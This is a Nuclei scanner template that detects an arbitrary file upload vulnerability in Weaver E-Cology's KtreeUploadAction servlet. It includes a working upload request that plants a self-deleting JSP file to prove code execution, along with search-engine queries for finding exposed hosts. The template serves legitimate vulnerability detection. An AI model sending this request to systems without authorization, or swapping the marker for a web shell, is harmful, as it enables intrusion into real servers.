nuclei-templates/http/vulnerabilities/weaver/weaver-ktreeuploadaction-fi...

57 lines
1.7 KiB
YAML
Raw Normal View History

2023-09-14 19:11:38 +00:00
id: weaver-ktreeuploadaction-file-upload
info:
name: Weaver E-Cology KtreeUploadAction - Arbitrary File Upload
author: SleepingBag945
severity: critical
description: |
There is a file upload vulnerability in Weaver E-Cology. An attacker can upload any file through KtreeUploadAction.jsp and further exploit it.
reference:
- https://buaq.net/go-117479.html
metadata:
max-request: 2
verified: true
shodan-query: ecology_JSessionid
fofa-query: app="泛微-协同办公OA"
tags: weaver,ecology,fileupload,intrusive
variables:
num1: "{{rand_int(40000, 50000)}}"
num2: "{{rand_int(40000, 50000)}}"
result: "{{to_number(num1)*to_number(num2)}}"
http:
- raw:
- |
@timeout: 20s
POST /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywgljfvib
------WebKitFormBoundarywgljfvib
Content-Disposition: form-data; name="test"; filename="{{randstr}}.jsp"
Content-Type: image/jpeg
<%out.print({{num1}} * {{num2}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
------WebKitFormBoundarywgljfvib--
- |
@timeout: 20s
GET {{filename}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
2023-09-17 16:11:07 +00:00
dsl:
2023-09-14 19:11:38 +00:00
- "status_code_1 == 200 && contains_all(body_1,'original', 'SUCCESS')"
- "contains(body_2, '{{result}}') && status_code_2 == 200"
condition: and
extractors:
- type: regex
name: filename
group: 1
regex:
- "','url':'(.*?)','title"
internal: true